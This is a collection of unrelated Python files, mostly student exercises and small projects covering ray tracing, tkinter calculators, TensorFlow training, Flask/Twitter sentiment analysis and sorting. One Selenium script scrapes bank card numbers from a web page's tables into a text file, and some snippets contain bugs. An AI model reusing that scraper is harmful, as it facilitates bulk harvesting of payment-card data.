u = uv0[0] * (1.0 - beta - gamma) + beta * uv1[0] + gamma * uv2[0]
v = uv0[1] * (1.0 - beta - gamma) + beta * uv1[1] + gamma * uv2[1]
return HitPoint(t, hit_point, normal, self.material_idx, u=u, v=v)
# eax = pointer to ray structure
# ebx = pointer to flat mesh structure
# ecx = pointer to minimum distance
# edx = pointer to hitpoint
@classmethod
def isect_asm(cls, runtimes, label):
lbl_name = "ray_tri" + str(id(cls))
cls.isect_triangles_asm(runtimes, lbl_name)
GridMesh.isect_asm(runtimes, label, cls.asm_struct_name(),
cls.asm_struct(), lbl_name, uv=cls.has_uv())
# eax = pointer to ray structure
# ebx = pointer to flat mesh structure
# ecx = pointer to minimum distance
@classmethod
def isect_asm_b(cls, runtimes, label):
lbl_name = "ray_tri_b" + str(id(cls))
cls.isect_triangles_asm_b(runtimes, lbl_name)
GridMesh.isect_asm(runtimes, label, cls.asm_struct_name(), cls.asm_struct(), lbl_name, visibility=True)
@classmethod
def ray_triangle_isect_asm(cls, runtimes, prefix):
assembler = create_assembler()
ray_isect_label = prefix + str(id(cls))
code = ray_triangle_intersection(ray_isect_label)
for r in runtimes:
if not r.global_exists(ray_isect_label):
mc = assembler.assemble(code, True)
r.load(ray_isect_label, mc)
return ray_isect_label
@classmethod
def epsilon(cls):
return 0.0005
# eax, rax = pointer to ray structure
# ebx, rbx = pointer to flat mesh structure
# ecx, rcx = pointer to minimum distance
# edx, rdx = address in linear grid array --- n:idx1, idx2, ...
@classmethod
def isect_triangles_asm(cls, runtimes, label):
bits = platform.architecture()[0]
bit64 = True if bits == "64bit" else False
ray_isect_label = cls.ray_triangle_isect_asm(runtimes, "ray_triangle_isect")
if bit64:
code = cls.isect_triangles_asm_64(label, ray_isect_label)
else:
code = cls.isect_triangles_asm_32(label, ray_isect_label)
assembler = create_assembler()
mc = assembler.assemble(code, True)
#mc.print_machine_code()
name = "ray_triangles_isects" + str(id(cls))
for r in runtimes:
if not r.global_exists(label):
r.load(name, mc)
@classmethod
def isect_triangles_asm_32(cls, label, ray_isect_label):
raise NotImplementedError()
@classmethod
def isect_triangles_asm_64(cls, label, ray_isect_label):
raise NotImplementedError()
# eax = pointer to ray structure
# ebx = pointer to flat mesh structure
# ecx = pointer to minimum distance
# edx = address in linear grid array --- n:idx1, idx2, ...
@classmethod
def isect_triangles_asm_b(cls, runtimes, label):
bits = platform.architecture()[0]
bit64 = True if bits == "64bit" else False
ray_isect_label = cls.ray_triangle_isect_asm(runtimes, "ray_triangle_isect")
if bit64:
code = cls.isect_triangles_asm_b_64(label, ray_isect_label)
else:
code = cls.isect_triangles_asm_b_32(label, ray_isect_label)
assembler = create_assembler()
mc = assembler.assemble(code, True)
#mc.print_machine_code()
name = "ray_triangles_isects_b" + str(id(cls))
for r in runtimes:
if not r.global_exists(label):
r.load(name, mc)
@classmethod
def isect_triangles_asm_b_32(cls, label, ray_isect_label):
raise NotImplementedError()
@classmethod
def isect_triangles_asm_b_64(cls, label, ray_isect_label):
raise NotImplementedError()
def __getstate__(self):
return {}
def translate(self, dx, dy, dz):
pass
def translate(self, sx, sy, sz):
pass
def prepare(self, performanse=False):
pass
|
from tkinter import*
def triangle_w():
global triangle_main
triangle_main=Tk()
triangle_main.title("Triangle")
pytago=Button(triangle_main,text="Square",command=pytago_w,fg="green")
pytago.pack()
Normal_area=Button(triangle_main,text="Normal area",fg="green",command=triangle_normal)
Normal_area.pack()
Normal_per=Button(triangle_main,text="Normal Perimeter",fg="green",command=triangle_normal_per)
Normal_per.pack()
close=Button(triangle_main,text="Close",command=close_triangle_m)
close.pack()
def close_triangle_m():
triangle_main.destroy()
def pytago_w():
global pytago_main
global a1,b1,c1
pytago_main=Tk()
pytago_main.title("Square")
pytago_main.geometry("600x400")
note=Label(pytago_main,text="Choose your edge to calculate by write a choosen edge number 0")
note.grid(row=0,column=0)
a=Label(pytago_main,text="AB=")
a.grid(row=1,column=0)
a1=Entry(pytago_main,width=5)
a1.grid(row=1,column=1)
b=Label(pytago_main,text="AC=")
b.grid(row=2,column=0)
b1=Entry(pytago_main,width=5)
b1.grid(row=2,column=1)
c=Label(pytago_main,text="BC=")
c.grid(row=3,column=0)
c1=Entry(pytago_main,width=5)
c1.grid(row=3,column=1)
start=Button(pytago_main,text="Start",command=start_pytago)
start.grid(row=4,column=0)
close=Button(pytago_main,text="Close",command=close_win)
close.grid(row=5,column=0)
def close_win():
pytago_main.destroy()
def start_pytago():
a2=a1.get()
b2=b1.get()
c2=c1.get()
a3=int(a2)
b3=int(b2)
c3=int(c2)
if a3==0:
ans=sqrt((c3**2)-(b3**2))
ans1=str(ans)
ans2=Label(pytago_main,text="AB="+ans1)
ans2.grid(row=5,column=0)
elif b3==0:
ans=sqrt((c3**2)-(a3**2))
ans1=str(ans)
ans2=Label(pytago_main,text="AC="+ans1)
ans2.grid(row=5,column=0)
elif c3==0:
ans=sqrt((a3**2)+(b3**2))
ans1=str(ans)
ans2=Label(pytago_main,text="BC="+ans1)
ans2.grid(row=5,column=0)
def triangle_normal():
global pytago_main
global Edge1,Height1
pytago_main=Tk()
pytago_main.title("Normal")
pytago_main.geometry("700x400")
lab=Label(pytago_main,text="Normal (area)")
lab.grid(row=0,column=0)
Edge=Label(pytago_main,text="Edge=")
Edge.grid(row=1,column=0)
Edge1=Entry(pytago_main,width=20)
Edge1.grid(row=1,column=1)
Height=Label(pytago_main,text="Height=")
Height.grid(row=2,column=0)
Height1=Entry(pytago_main,width=20)
Height1.grid(row=2,column=1)
But=Button(pytago_main,text="Start area",command=start_normal_area)
But.grid(row=3,column=0)
Close=Button(pytago_main,text="CLose",command=close_normal_area)
Close.grid(row=4,column=0)
def start_normal_area():
edge2=Edge1.get()
height2=Height1.get()
height3=int(height2)
edge3=int(edge2)
ans=(height3*edge3)/2
ans1=Label(pytago_main,text="The answer is: "+str(ans))
ans1.grid(row=4,column=0)
def close_normal_area():
pytago_main.destroy()
def triangle_normal_per():
global pytago_main
global a,b,c
pytago_main=Tk()
pytago_main.title("Perimeter")
pytago_main.geometry("700x400")
lab=Label(pytago_main,text="Normal (perimeter)")
lab.grid(row=0,column=0)
a1=Label(pytago_main,text="a=")
a1.grid(row=1,column=0)
a=Entry(pytago_main,width=30)
a.grid(row=1,column=1)
b1=Label(pytago_main,text="b=")
b1.grid(row=2,column=0)
b=Entry(pytago_main,width=30)
b.grid(row=2,column=1)
c1=Label(pytago_main,text="c=")
c1.grid(row=3,column=0)
c=Entry(pytago_main,width=30)
c.grid(row=3,column=1)
But=Button(pytago_main,text="Start perimeter",command=start_normal_per)
But.grid(row=4,column=0)
Close=Button(pytago_main,text="CLose",command=close_normal_area)
Close.grid(row=5,column=0)
def start_normal_per():
a2=a.get()
b2=b.get()
c2=c.get()
a3=int(a2)
b3=int(b2)
c3=int(c2)
ans=a3+b3+c3
ans1=Label(pytago_main,text="The answer is: "+str(ans))
ans1.grid(row=6,column=0)
|
from jarvis.io.wannier.outputs import (
WannierHam,
Wannier90wout,
Wannier90eig,
get_projectors_for_formula,
get_orbitals,
)
import os
import tempfile
from jarvis.core.kpoints import generate_kgrid
from jarvis.io.vasp.inputs import Poscar
import matplotlib.pyplot as plt
plt.switch_backend("agg")
new_file, filename = tempfile.mkstemp()
atoms = Poscar.from_file(
os.path.join(
os.path.dirname(__file__),
"..",
"..",
"analysis",
"structure",
"POSCAR",
)
).atoms
wann_soc_win_hr = os.path.join(os.path.dirname(__file__), "wannier90_hr.dat")
wann_wout = os.path.join(os.path.dirname(__file__), "wannier90.wout")
wann_eig = os.path.join(os.path.dirname(__file__), "wannier90.eig")
soc_scfband_vrun = os.path.join(
os.path.dirname(__file__), "vasprun.xml"
) # for JVASP-1067
def test_outputs_bi2se3():
pp = get_projectors_for_formula(formula_dict={"Cr": 1, "I": 3})[0]
orb = get_orbitals()[0]
x = get_orbitals(
projection_info=[["Cr", 4, ["s", "d"]], ["I", 3, ["s", "p"]]],
desired_orbitals=[["Cr", "d"]],
)
print(x)
x = get_orbitals(
projection_info=[["Cr", 4, ["s", "d"]], ["I", 3, ["s", "p"]]],
desired_orbitals=[["Cr", "s"]],
)
print(x)
w = WannierHam(filename=wann_soc_win_hr)
new_file, filename = tempfile.mkstemp()
comp = w.compare_dft_wann(
vasprun_path=soc_scfband_vrun, plot=True, filename=filename + ".png"
)
maxdiff = comp["maxdiff"]
info = w.to_dict()
dd = WannierHam.from_dict(info)
pp = get_projectors_for_formula()[0][0]
# print("getorbs", pp)
kpoints = generate_kgrid([5, 5, 5])
energies, dos, pdos = w.dos(kpoints)
orb = get_orbitals()[0]
big = w.generate_supercell([2, 2, 2])
pp = get_projectors_for_formula()
x = get_orbitals()
new_file, filename = tempfile.mkstemp()
# print(pp, orb)
w.get_bandstructure_plot(atoms=atoms, filename=filename)
# print (x,pp)
w.find_nodes(nk1=1,nk2=1,nk3=1)
w.fermi_surf_2d(nk1=1,nk2=1)
w.chern_number_simple()
# print (round(dos[75],3))
assert (
round(maxdiff, 2),
round(dos[75], 3),
pp[0][0],
orb,
w.nwan,
big.nwan,
) == (0.12, 3.02, "Bi", 1, 40, 320,)
def test_wann_cent():
centers = Wannier90wout(wout_path=wann_wout).give_wannier_centers()
# print (centers, len(centers))
assert (len(centers)) == (40)
def wann_eig():
eigs = Wannier90eig(wann_eig)
eigs.give_wannier_eigs()
eigs.neigs()
eigs.nk()
# test_outputs_cri3()
# test_wann_cent()
|
# harshad number :
# it is take any number and add this two digit number and check the
# addition value is divisible bye this two digit number then it is divisible then its harshad
# number then it not divisiblr then it not harshad number
# forEx; 43
# 4+3=7
# 7/43
# num=int(input("enter a number "))
# i=0
# while i<1:
# a=num%10
# b=(num//10)%10
# c=(num//10)//10
# d=a+b+c
# i=i+1
# if num%d==0:
# print("harshad number")
# else:
# print("not harshad number")
i=1
while i<1000:
a=i%10
b=(i//10)%10
c=(i//10)//10
d=a+b+c
i=i+1
if i%d==0:
print("harshad number",i)
else:
print("not harshad number",i) |
import Layers
import DataSets as ds
import numpy as np
import tensorflow as tf
#############################################################################
# Creates a graph.
a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
c = tf.matmul(a, b)
# Creates a session with log_device_placement set to True.
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# Runs the op.
print(sess.run(c))
################################################################################
################################################################################
################################################################################
#define a get_dict function to extract next training batch in training mode
def get_dict(database,IsTrainingMode):
xs,ys = database.NextTrainingBatch()
return {x:xs,y_desired:ys,ITM:IsTrainingMode}
#Loading model is false
LoadModel = False
#??
KeepProb_Dropout = 0.9
#we give a nem to the expirement KeepProb_Dropout
experiment_name = '10k_Dr%.3f'%KeepProb_Dropout
#train = ds.DataSet('../DataBases/data_1k.bin','../DataBases/gender_1k.bin',1000)
train = ds.DataSet('D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/data_10k.bin','D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/gender_10k.bin',10000)
#train = ds.DataSet('../DataBases/data_100k.bin','../DataBases/gender_100k.bin',100000)
test = ds.DataSet('D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/data_test10k.bin','D:/bdr/Documents/TP 3 tensor flow/Deep_Learning_Cours/Deep_Learning_Cours/DataBases/gender_test10k.bin',10000)
#we give to tf our x as input and y as output
with tf.name_scope('input'):
x = tf.placeholder(tf.float32, [None, train.dim],name='x')
y_desired = tf.placeholder(tf.float32, [None, 2],name='y_desired')
ITM = tf.placeholder("bool", name='Is_Training_Mode')
#we unflat our images to apply the filters "nbfilters=3" in traing mode
with tf.name_scope('CNN'):
t = Layers.unflat(x,48,48,1)
nbfilter = 3
for k in range(4):
for i in range(2):
t = Layers.conv(t,nbfilter,3,1,ITM,'conv_%d_%d'%(nbfilter,i),KeepProb_Dropout)
t = Layers.maxpool(t,2,'pool')
nbfilter *= 2
#after we flat our image
t = Layers.flat(t)
#t = Layers.fc(t,50,ITM,'fc_1',KeepProb_Dropout)
y = Layers.fc(t,2,ITM,'fc_2',KP_dropout=1.0,act=tf.nn.log_softmax)
with tf.name_scope('cross_entropy'):
diff = y_desired * y
with tf.name_scope('total'):
cross_entropy = -tf.reduce_mean(diff)
tf.summary.scalar('cross entropy', cross_entropy)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_desired, 1))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
with tf.name_scope('learning_rate'):
global_step = tf.Variable(0, trainable=False)
learning_rate = tf.train.exponential_decay(1e-3,global_step,1000, 0.75, staircase=True)
with tf.name_scope('learning_rate'):
tf.summary.scalar('learning_rate', learning_rate)
#train_step = tf.train.GradientDescentOptimizer(0.00001).minimize(cross_entropy)
train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy,global_step=global_step)
merged = tf.summary.merge_all()
Acc_Train = tf.placeholder("float", name='Acc_Train');
Acc_Test = tf.placeholder("float", name='Acc_Test');
MeanAcc_summary = tf.summary.merge([tf.summary.scalar('Acc_Train', Acc_Train),tf.summary.scalar('Acc_Test', Acc_Test)])
print ("-----------",experiment_name)
print ("-----------------------------------------------------")
print ("-----------------------------------------------------")
sess = tf.Session()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(experiment_name, sess.graph)
saver = tf.train.Saver()
if LoadModel:
saver.restore(sess, "./model.ckpt")
nbIt = 5000
for it in range(nbIt):
trainDict = get_dict(train,IsTrainingMode=True)
sess.run(train_step, feed_dict=trainDict)
if it%10 == 0:
acc,ce,lr = sess.run([accuracy,cross_entropy,learning_rate], feed_dict=trainDict)
print ("it= %6d - rate= %f - cross_entropy= %f - acc= %f" % (it,lr,ce,acc ))
summary_merged = sess.run(merged, feed_dict=trainDict)
writer.add_summary(summary_merged, it)
if it%100 == 50:
Acc_Train_value = train.mean_accuracy(sess,accuracy,x,y_desired,ITM)
Acc_Test_value = test.mean_accuracy(sess,accuracy,x,y_desired,ITM)
print ("mean accuracy train = %f test = %f" % (Acc_Train_value,Acc_Test_value ))
summary_acc = sess.run(MeanAcc_summary, feed_dict={Acc_Train:Acc_Train_value,Acc_Test:Acc_Test_value})
writer.add_summary(summary_acc, it)
writer.close()
if not LoadModel:
saver.save(sess, "./model.ckpt")
sess.close()
|
from pprint import pprint, pformat
import logging
from logging.config import dictConfig
import colorlog
from colorlog import ColoredFormatter
# cf : https://stackoverflow.com/questions/17668633/what-is-the-point-of-setlevel-in-a-python-logging-handler
### create a formatter for future logger
formatter = ColoredFormatter(
"%(log_color)s%(levelname)1.1s ::: %(name)s %(asctime)s ::: %(module)s:%(lineno)d -in- %(funcName)s ::: %(reset)s %(white)s%(message)s",
datefmt='%y-%m-%d %H:%M:%S',
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red,bg_white',
},
secondary_log_colors={},
style='%'
)
### create handler
handler = colorlog.StreamHandler()
handler.setFormatter(formatter)
### create logger
log = colorlog.getLogger("log")
log.addHandler(handler)
### set logging level
log.setLevel(logging.DEBUG)
log_file_I = logging.handlers.RotatingFileHandler('logs/info_logs.log')
log_file_I.setFormatter(formatter)
log_file_I.setLevel(logging.INFO)
log.addHandler(log_file_I)
log_file_W = logging.handlers.RotatingFileHandler('logs/warning_logs.log')
log_file_W.setFormatter(formatter)
log_file_W.setLevel(logging.INFO)
log.addHandler(log_file_W)
|
"""
Implementation of Shell sort sorting technique
"""
def shell_sort(arr):
n = len(arr)
gap = n // 2
while gap > 0:
for i in range(gap, n):
temp = arr[i]
j = i
while j >= gap and arr[j - gap] > arr[j]:
arr[j] = arr[j - gap]
j -= gap
arr[j] = temp
gap //= 2
return arr
array = list(map(int, input('Enter array elements: ').strip().split()))
print('Given array: ', array)
print('Sorted array: ', shell_sort(array))
input()
|
#!/usr/bin/env python
#Author: Tyler Fornes
#Filename: switcheroo.py
#Function: Clones specified webpage to local copy and replaces a specified word with a given replacement
import sys
import urllib2
def getter():
response = urllib2.urlopen(sys.argv[1])
html = response.read()
return html
def reader():
file = open('lol.html', 'r')
read_html = file.read()
file.close()
return read_html
def replacer(html):
new_html=html.replace(sys.argv[2], sys.argv[3])
return new_html
def writer(text):
file = open("lol.html", "w")
file.write(text)
file.close()
def main():
#grabs copy of webpage specified by user
html_text = getter()
#writes html text to file lol.html
writer(html_text)
#reads in text from lol.html
copy_html = reader()
#sends text to be processed for word replacement
lol_html = replacer(copy_html)
#writes replaced text to lol.html
writer(lol_html)
if __name__ == "__main__":
main()
|
from django.shortcuts import render, render_to_response
from versiontools.osutils import AssemblyInfoFinder
from django.template.context import RequestContext
# Create your views here.
def show_assemblyinfo(request):
af = AssemblyInfoFinder()
directory_to_scan =r'C:\Users\lberrocal\Documents\Visual Studio 2010\Projects\vessel_scheling_app'
af.find(directory_to_scan)
context = RequestContext(request)
context_dict = {'assembly_info_list': af.assembly_info_list,
'scanned_directory' : directory_to_scan,
'dlen' : 30}
return render_to_response('versiontools/assembly-info-list.html', context_dict, context)
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
from KratosMultiphysics import IsDistributedRun
from KratosMultiphysics.FluidDynamicsApplication.adjoint_fluid_analysis import AdjointFluidAnalysis
if (IsDistributedRun()):
raise Exception("Distributed runs are not yet supported with periodic adjoint analysis")
else:
from KratosMultiphysics.RANSApplication.adjoint_fluid_solver_no_replace import AdjointFluidSolverNoReplace as adjoint_fluid_solver_no_replace
class PeriodicAdjointFluidAnalysis(AdjointFluidAnalysis):
def _CreateSolver(self):
return adjoint_fluid_solver_no_replace(self.model, self.project_parameters["solver_settings"])
|
import os
import pandas as pd
import numpy as np
import pprint
import re
import tweepy
from tweepy import OAuthHandler
from textblob import TextBlob
import json
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
from flask import Flask, jsonify, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
#################################################
# Database Setup
#################################################
#app.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', '') or "sqlite:///db/bellybutton.sqlite"
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db/project2db.sqlite"
db = SQLAlchemy(app)
# reflect an existing database into a new model
Base = automap_base()
# reflect the tables
Base.prepare(db.engine, reflect=True)
# Save references to each table for tweet data
Articles = Base.classes.articles1
Tweets = Base.classes.tweets1
Tweets_loc = Base.classes.tweets_loc1
Sentiment = Base.classes.sentiment1
#Tables for Bitcoin Gold and SP index prices
BTC_Quotes = Base.classes.BTC_Quotes1
GLD_Quotes = Base.classes.GLD_Quotes1
SPX_Quotes = Base.classes.SPX_Quotes1
#Table with coordinates for world countries
country_coordinate = Base.classes.country_coordinate1
@app.route("/")
def index():
"""Return the homepage."""
# return render_template("index1.html")
return render_template("sentimenttweet.html")
#Route to present World Heat Map where tweets occurred is rendered
@app.route("/tweetmap")
def tweetmap():
return render_template("maptweets.html")
#
@app.route("/tweetsloc")
def tweetsloc():
"""Return a list with location for tweets and sentiment values"""
# Use Pandas to perform the sql query
stmt = db.session.query(Tweets_loc).statement
df = pd.read_sql_query(stmt, db.session.bind)
latitude = list(df['latitude'])
longitude = list(df['longitude'])
locations = []
for i in range(0, len(latitude)):
locations.append([latitude[i], longitude[i]])
# Return a dictionary with tweets location and sentiment
return jsonify(locations)
#Get the number of positive, negative and neutral tweets read
@app.route("/tweetsent")
def tweetssent():
"""Return a dictionary with split of tweets by type of sentiment (positive, negative & neutral)"""
# Use Pandas to perform the sql query
stmt = db.session.query(Sentiment).statement
df = pd.read_sql_query(stmt, db.session.bind)
sentiment = {
"positive" : list(df["positive"]),
"negative" : list(df["negative"]),
"neutral" : list(df["neutral"])
}
# Return a dictionary with sentiment split
return jsonify(sentiment)
#Read tweets live - what people are tweeting about BITCOIN now
@app.route("/readtweets")
def readtweets():
"""Read tweets live"""
# Load twitter credentials from json file
with open("twitter_credentials.json", "r") as file:
creds = json.load(file)
class TwitterClient(object):
#Generic Twitter Class for sentiment analysis.
def __init__(self):
#Class constructor or initialization method.
# keys and tokens from the Twitter Dev Console
consumer_key = creds['CONSUMER_KEY']
consumer_secret = creds['CONSUMER_SECRET']
access_token = creds['ACCESS_TOKEN']
access_token_secret = creds['ACCESS_SECRET']
# attempt authentication
try:
# create OAuthHandler object
self.auth = OAuthHandler(consumer_key, consumer_secret)
# set access token and secret
self.auth.set_access_token(access_token, access_token_secret)
# create tweepy API object to fetch tweets
self.api = tweepy.API(self.auth)
except:
print("Error: Authentication Failed")
def clean_tweet(self, tweet):
#Utility function to clean tweet text by removing links, special characters
# using simple regex statements.
return ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
def get_tweet_sentiment(self, tweet):
#Utility function to classify sentiment of passed tweet
# using textblob's sentiment method
# create TextBlob object of passed tweet text
analysis = TextBlob(self.clean_tweet(tweet))
# set sentiment
if analysis.sentiment.polarity > 0:
return 'positive'
elif analysis.sentiment.polarity == 0:
return 'neutral'
else:
return 'negative'
#Get 10 tweets at the time to avoid getting error
def get_tweets(self, query, count = 10):
#Main function to fetch tweets and parse them.
# empty list to store parsed tweets
tweets = []
try:
# call twitter api to fetch tweets
fetched_tweets = self.api.search(q = query, count = count, since="2017-04-03")
# parsing tweets one by one
for tweet in fetched_tweets:
# empty dictionary to store required params of a tweet
parsed_tweet = {}
# saving text of tweet
parsed_tweet['text'] = tweet.text
# saving sentiment of tweet
parsed_tweet['sentiment'] = self.get_tweet_sentiment(tweet.text)
# appending parsed tweet to tweets list
if tweet.retweet_count > 0:
# if tweet has retweets, ensure that it is appended only once
if parsed_tweet not in tweets:
tweets.append(parsed_tweet)
else:
tweets.append(parsed_tweet)
# return parsed tweets
return tweets
except tweepy.TweepError as e:
# print error (if any)
print("Error : " + str(e))
# creating object of TwitterClient Class
api = TwitterClient()
# calling function to get tweets
topic = 'Bitcoin'
tweets = api.get_tweets(query = topic, count = 200)
# picking positive tweets from tweets
ptweets = [tweet for tweet in tweets if tweet['sentiment'] == 'positive']
# percentage of positive tweets
pptweets = 100*len(ptweets)/len(tweets)
# picking negative tweets from tweets
ntweets = [tweet for tweet in tweets if tweet['sentiment'] == 'negative']
neutweets = [tweet for tweet in tweets if tweet['sentiment'] == 'neutral']
# percentage of negative tweets
pntweets = 100*len(ntweets)/len(tweets)
# percentage of neutral tweets
pneutral = 100 * (len(tweets) - len(ntweets) - len(ptweets))/len(tweets)
tsentiment = {
'negative' : pntweets,
'positve' : pptweets,
'neutral' : pneutral}
nsentiment = {
'negative' : len(ntweets),
'positve' : len(ptweets),
'neutral' : len(tweets) - len(ptweets) - len(ntweets)
}
tweetsdict = {
'psentiment': tsentiment,
'nsentiment' : nsentiment,
'positive': ptweets,
'negative': ntweets,
'neutral' : neutweets,
'all': tweets
}
# Return a list of the column names (sample names)
return jsonify(tweetsdict)
#return jsonify(nsentiment)
if __name__ == "__main__":
app.run()
|
import os
import torch
import random
import argparse
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from dataset import add_args_to_string
from training_VAE import VarAutoencoder
from dataset import DoubleMnistDataset, AddGaussianNoise, AddOcclusion
# Constants
ENCODED_SPACE_DIM=6
# Define paths
data_root_dir = '../datasets'
out_path = 'datasets/'
plots_dir = 'plots/'
params_dir = 'params/'
# Parse arguments
parser = argparse.ArgumentParser(description='Analyze the latent space.')
parser.add_argument('--add_noise', type=float, default=0, help='Variance of Gaussian noise added over the input image' )
parser.add_argument('--add_occlusion', type=int, default=0, help='Number of occluded rows over the input image')
parser.add_argument('--encoded_dim', type=int, default=ENCODED_SPACE_DIM, help='Encoded space dimension')
# parse input arguments
args = parser.parse_args()
# Initialize the VarAutoencoder object
net = VarAutoencoder(encoded_space_dim=args.encoded_dim)
# Select device
device_name = 'cuda' if torch.cuda.is_available() else 'cpu'
device = torch.device(device_name)
print('Using device:', device)
# Load network parameters
net.load_state_dict(torch.load(params_dir+'net_params_{}.pth'.format(args.encoded_dim), map_location=device_name))
# Move all the network parameters to the selected device
net.to(device)
# Load test data
with open(out_path+add_args_to_string('test', args, ["encoded_dim"])+'.pth', 'rb') as in_file:
test_dataset = torch.load(in_file)
# Get the encoded representation of the test samples
encoded_samples = []
for sample in tqdm(test_dataset):
img = sample[0][0].unsqueeze(0).to(device)
label = sample[0][1]
# Encode image
net.eval()
with torch.no_grad():
encoded_img = net.sample(*net.encode(img))
# Append to list
encoded_samples.append((encoded_img.flatten().cpu().numpy(), label))
# Visualize encoded space
color_map = {
0: '#1f77b4',
1: '#ff7f0e',
2: '#2ca02c',
3: '#d62728',
4: '#9467bd',
5: '#8c564b',
6: '#e377c2',
7: '#7f7f7f',
8: '#bcbd22',
9: '#17becf'
}
# Randomly sample 1k points to plot
# encoded_samples_reduced = random.sample(encoded_samples, 1000)
# Create a numpy array with sampled points
encoded_samples_np = np.vstack([x[0] for x in encoded_samples])
print("Original shape: ", encoded_samples_np.shape)
# Reduce dimensionality with Principal Components Analysis
if args.encoded_dim > 2:
pca = PCA(n_components=2)
principalComponents = pca.fit_transform(encoded_samples_np)
print("Compressed shape: ", principalComponents.shape)
else:
principalComponents = encoded_samples_np
plt.figure(figsize=(8,6))
for i in tqdm(range(principalComponents.shape[0])):
label = encoded_samples[i][1]
components = principalComponents[i]
plt.plot(components[0], components[1], marker='.', color=color_map[label])
plt.grid(True)
legend = [plt.Line2D([0], [0], ls='', marker='.', color=c, label=l) for l, c in color_map.items()]
plt.legend(legend, color_map.keys(), loc='lower center', bbox_to_anchor=(0.5, 1), ncol=5, fontsize=12, frameon=False)
plt.tight_layout()
plt.savefig(plots_dir+add_args_to_string("PCA_", args)+".png", transparent=True, dpi=300)
plt.show()
if args.encoded_dim == 2:
n_images = 12
# Two points in the encoded space corresponding to digits
start = np.array([10, -15])
stop = np.array([0, 10])
# Generate samples
line = np.linspace(start, stop, n_images)
encoded_value_list = [torch.tensor(x).float().unsqueeze(0).to(device) for x in line]
# Generate corresponding images
net.eval()
new_img_list = []
with torch.no_grad():
for encoded_value in encoded_value_list:
new_img_list.append(net.decode(encoded_value))
# Plot results
fig, axs = plt.subplots(2, 6, figsize=(18,6))
for i, ax in enumerate(axs.flatten()):
ax.imshow(new_img_list[i].squeeze().cpu().numpy(), cmap='gist_gray')
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
plt.savefig(plots_dir+"generated_digits.png", transparent=True, dpi=300)
plt.show()
|
# ***corey pandas***
import json
with open ('s3.json') as f:
new_string = json.load(f)
with open('claims2.json') as f2:
new_string2 = json.load(f2)
# for new_list in new_strig:
# print(new_list)
# print(new_strig)
def sorting(item):
if isinstance(item, dict):
return sorted((key, sorting(values)) for key, values in item.items())
if isinstance(item, list):
return sorted(sorting(x) for x in item)
else:
return item
print(sorting(new_string) == sorting(new_string2))
# parquet schema nikalo and compare karo json se (json to parquet conversion hai wahi na)
# (statuses)
# schema of prquet as input and print the shema
# warranty contract all three tables and claims
# print(sorting(new_string) == sorting(json2_dict)) |
# Programming Exercise 5-12
#
# Program to find the greater of two integers.
# This program accepts two integers,
# passes them to a function that compares them,
# and displays which one is greater.
# define the main function
def main():
# Define local variables to hold two integers
int_1 = 0
int_2 = 0
# prompt the user for the first integer
int_1 = int(input("Enter the first int: "))
# prompt the user for the second integer
int_2 = int(input("Enter second int: "))
# print the return value from calling a function to find the greater of two integers
# the two integers are passed as arguments
if int_1 != int_2:
greater_int = greater(int_1, int_2)
print(greater_int, " is greater")
else:
print("Both are equal")
# Define a function to compare integer values.
# This function accepts two integer parameters,
# compares them,
# and returns the value of the greater.
def greater(int_1, int_2):
# if the first integer is greater, return the first integer
if int_1 > int_2:
return(int_1)
# else, return the second integer
elif int_1 < int_2:
return(int_2)
else:
return ("both numbers are equal")
# Call the main function to start the program
main()
|
#!/usr/bin/env python
# coding=utf-8
'''
@author: Zuber
@date: 2019/8/8 9:38
'''
import os
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_bank_url():
os.system(
'start chrome.exe --remote-debugging-port=9222 --user-data-dir="F:\selenum\AutomationProfile"')
options = Options()
options.add_experimental_option("debuggerAddress", "127.0.0.1:9222") # 前面设置的端口号
driver = webdriver.Chrome(
executable_path=r'./chromedriver.exe',
options=options)
# driver.implicitly_wait(2)
wait = WebDriverWait(driver, 10)
try:
driver.get('https://www.jlshare.top/bankCard')
# driver.maximize_window()
wait.until(
EC.presence_of_element_located((By.ID, 'banck')))
trs = driver.find_elements_by_xpath("//table[@id='banck']/tbody/tr")
bankcard={}
for i in trs:
i.click()
print(i.text)
subtrs = i.find_elements_by_xpath("//table[@id='subbanck']/tbody/tr")
for sub in subtrs:
sub.click()
print(sub.text)
cardNoList = i.find_elements_by_xpath("//table[@id='cardNoList']/tr")
for card in cardNoList:
f = open("banknumbers.txt", 'a') # 存储爬取到的银行卡的数据
print(sub.text, card.text, file=f)
print(sub.text, card.text)
# driver.quit()
except Exception as e:
print(f"{e}")
if __name__ == '__main__':
open_bank_url()
|
# This file contains the stack ADT
from collections import deque
class Stack:
# Create a deque
